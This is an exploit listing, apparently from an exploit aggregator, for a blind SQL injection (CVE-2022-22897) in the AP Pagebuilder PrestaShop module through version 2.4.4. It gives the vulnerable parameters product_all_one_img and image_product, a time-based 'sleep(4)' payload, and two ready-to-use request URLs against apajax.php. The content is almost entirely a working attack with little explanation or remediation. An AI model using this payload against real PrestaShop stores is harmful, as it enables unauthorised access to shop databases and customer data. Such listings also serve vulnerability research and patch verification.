Exploit for PrestaShop Ap Pagebuilder 2.4.4 SQL Injection CVE-2022-22897

Name: Exploit for PrestaShop Ap Pagebuilder 2.4.4 SQL Injection CVE-2022-22897
Rating: 5 (271 reviews)

2022-08-25 | CVSS 0.5

## https://sploitus.com/exploit?id=PACKETSTORM:168148
# Exploit Title: AP PAGEBUILDER Prestashop module <= 2.4.4 'product_all_one_img' , 'image_product' Blind SQL Injection  
# Date: 24-08-2022  
# Exploit Author: Mohamed Ali Hammami  
# Vendor Homepage: https://apollotheme.com/  
#Software Link : https://apollotheme.com/products/ap-pagebuilder-prestashop-module  
# Version: 2.4.4  
# Tested on: Windows 10  
#CVE: CVE-2022-22897  
  
Parameters: product_all_one_img,image_product  
  
Payload: 1) or sleep(4) #  
  
Exploit:  
http://localhost/modules/appagebuilder/apajax.php?rand=1641313272327&leoajax=1&product_all_one_img=1)+or+sleep(4)%23&image_product=0&wishlist_compare=1  
http://localhost/modules/appagebuilder/apajax.php?rand=1641313272327&leoajax=1&product_all_one_img=1&image_product=1)+or+sleep(4)%23&wishlist_compare=1